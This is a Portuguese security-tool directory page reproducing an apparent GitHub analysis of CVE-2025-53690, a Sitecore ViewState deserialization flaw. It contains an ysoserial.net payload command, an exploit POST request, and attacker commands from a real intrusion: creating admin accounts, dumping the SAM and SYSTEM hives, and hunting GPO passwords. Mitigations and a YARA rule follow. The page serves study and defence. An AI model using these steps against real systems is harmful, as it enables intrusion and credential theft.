Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-53690-Analysis — Este é o documento de análise do CVE-2025-53690. | Kitploit
Ferramentas/GitHubGitHub/m0d0ri205/cve-2025-53690-analysis
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAnálise ForenseAnálise de MalwareTestes de PenetraçãoAprendizado e EducaçãoRed TeamingResposta a Incidentes
GitHubm0d0ri205/cve-2025-53690-analysis

CVE-2025-53690-Analysis

Este é o documento de análise do CVE-2025-53690.

3há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

CVE-2025-53690: Análise da vulnerabilidade de desserialização do ViewState no Sitecore

Visão geral

CVE-2025-53690 é uma vulnerabilidade de desserialização do ViewState encontrada na família de produtos Sitecore que permite execução remota de código ao explorar chaves de máquina ASP.NET expostas, sendo uma vulnerabilidade de segurança crítica.

Informações básicas

  • ID do CVE: CVE-2025-53690
  • Pontuação CVSS: 9.0 (Crítica)
  • Tipo de vulnerabilidade: Desserialização de dados não confiáveis (CWE-502)
  • Data da descoberta: setembro de 2025
  • Data de divulgação: 3 de setembro de 2025
  • Exploração real: explorada como zero-day desde dezembro de 2024

Produtos afetados

  • Sitecore Experience Manager (XM) – todas as versões até 9.0
  • Sitecore Experience Platform (XP) – todas as versões até 9.0
  • Sitecore Experience Commerce (XC)
  • Sitecore Managed Cloud
  • Módulo Active Directory até 1.4

Análise detalhada da vulnerabilidade

Causa raiz

O cerne desta vulnerabilidade está no gerenciamento incorreto de configuração:

  1. Uso de chave de máquina de exemplo: chaves de máquina ASP.NET de exemplo incluídas nos guias de implantação do Sitecore anteriores a 2017 foram usadas como estavam em ambientes de produção
  2. Reutilização de chaves estáticas: a mesma chave de máquina foi reutilizada repetidamente em várias implantações
  3. Bypass da validação do ViewState: por meio das chaves expostas, é possível contornar a verificação de integridade do ViewState

Mecanismo do ViewState ASP.NET

ViewState é um recurso de gerenciamento de estado do ASP.NET que:

  • Armazena o estado da página no campo oculto __VIEWSTATE
  • Usa a chave de máquina para garantir integridade e confidencialidade
  • O servidor desserializa o ViewState para restaurar o estado da página
root@kitploit:~
<!-- Exemplo de web.config -->
<system.web>
    <machineKey 
        validationKey="[chave de 64 bytes]"
        decryptionKey="[chave de 48 bytes]"
        validation="HMACSHA256" 
        decryption="AES" />
</system.web>

Vetores de ataque

1. Identificação de endpoints vulneráveis

root@kitploit:~
Alvo: /sitecore/blocked.aspx
Método: POST
Características: acessível sem autenticação, usa ViewState

2. Geração de payload malicioso de ViewState

O atacante gera o payload malicioso usando a chave de máquina conhecida e o ysoserial.net:

root@kitploit:~
# Exemplo de uso com ysoserial.net
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[chave]" --validationalg="HMACSHA256" --decryptionkey="[chave]" --decryptionalg="AES"

3. Envio da solicitação HTTP

root@kitploit:~
POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=[payload_malicioso]&__VIEWSTATEGENERATOR=[valor]

Análise de casos reais de ataque (relatório da Mandiant)

Ciclo de vida do ataque

Fase 1: Penetração inicial

  • Endpoint: /sitecore/blocked.aspx
  • Método: ataque de desserialização do ViewState
  • Privilégios: NETWORK SERVICE (processo de trabalho do IIS)
  • Payload: ferramenta de reconhecimento WEEPSTEEL

Fase 2: Reconhecimento e estabelecimento de posição

root@kitploit:~
# Comandos executados
whoami
hostname  
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"

Ferramentas implantadas:

  • 7za.exe: ferramenta de compactação de arquivos
  • lfe.ico: ferramenta de tunelamento de rede EARTHWORM
  • 1.vbs: script VBScript para execução de comandos

Fase 3: Elevação de privilégios

root@kitploit:~
# Criação de conta de administrador local
net user asp$ [senha] /add
net localgroup administrators asp$ /add

net user sawadmin [senha] /add  
net localgroup administrators sawadmin /add

Coleta de credenciais:

root@kitploit:~
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive

Fase 4: Garantia de persistência

  • Acesso via RDP: usando as contas de administrador criadas
  • DWAGENT: instalação de ferramenta de acesso remoto (registrada como serviço com privilégios de SYSTEM)
  • Alteração das configurações de conta:
root@kitploit:~
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False

Fase 5: Reconhecimento interno

root@kitploit:~
# Identificação do Domain Controller
nltest /DCLIST:[dominio]
nslookup [domain-controller]

# Busca por cpassword em GPO (ataque de Group Policy Preferences)
findstr /S /l cpassword \\[DC]\sysvol\[dominio]\policies\*.xml

# Execução do BloodHound/SharpHound
sh.exe -c all

Fase 6: Movimentação lateral

  • Acesso via RDP a outros sistemas usando contas de administrador de domínio roubadas
  • Bypass de segurança por meio de tunelamento de rede com EARTHWORM

Análise das ferramentas usadas

WEEPSTEEL (ferramenta de reconhecimento)

root@kitploit:~
// Informações coletadas
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
    Directories = new Information.Directories
    {
        CurrentWebDirectory = HostingEnvironment.MapPath("~/")
    },
    OperatingSystemInformation = Information.GetOperatingSystemInformation(),
    DiskInformation = Information.GetDiskInformation(),
    NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
    Process = Information.GetProcessInformation()
};

Método de saída: ocultação de dados disfarçada de ViewState

root@kitploit:~
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 
       value="/wEPDwUKLTcyODc4{criptografia AES + saída codificada em base64}" />

EARTHWORM (tunelamento de rede)

  • Funciona como servidor proxy SOCKS v5
  • Bypass de firewall e ocultação de tráfego
  • Evita detecção tunelando tráfego RDP

DWAGENT (acesso remoto)

  • Ferramenta legítima de administração remota
  • Registrada como serviço com privilégios de SYSTEM
  • Persistência garantida por inicialização automática

SHARPHOUND (reconhecimento de AD)

  • Ferramenta de coleta de dados para o BloodHound
  • Mapeamento do ambiente Active Directory
  • Identificação de caminhos de ataque

Medidas de defesa e mitigação

Ações imediatas

root@kitploit:~
<!-- Geração de chave de máquina exclusiva -->
<machineKey 
    validationKey="[nova_chave_de_64_bytes]"
    decryptionKey="[nova_chave_de_48_bytes]"
    validation="HMACSHA256" 
    decryption="AES" />

Medidas de reforço de segurança

  1. Rotação automatizada de chaves
  2. Ativação da verificação MAC do ViewState
  3. Criptografia de arquivos de configuração
  4. Segmentação de rede
  5. Monitoramento aprimorado

Regras de detecção

root@kitploit:~
# Exemplo de regra YARA (detecção do WEEPSTEEL)
rule WEEPSTEEL_Detection {
    strings:
        $viewstate = "__VIEWSTATE"
        $crypto = "System.Security.Cryptography"
        $serializer = "JavaScriptSerializer"
    condition:
        all of them
}

Conclusão

O CVE-2025-53690 é um exemplo representativo de como um simples erro de configuração pode se transformar em uma ameaça de segurança crítica. Por meio dessa vulnerabilidade, os aprendizes podem vivenciar todo o ciclo de vida de um ataque APT real e compreender técnicas de ataque modernas e estratégias de defesa.

Referências

  • Google Cloud Blog - ViewState Deserialization Zero-Day
  • Sitecore Advisory SC2025-005
  • CISA KEV Catalog
  • ysoserial.net
  • Microsoft Security Blog - ASP.NET Machine Keys
Baixar ferramenta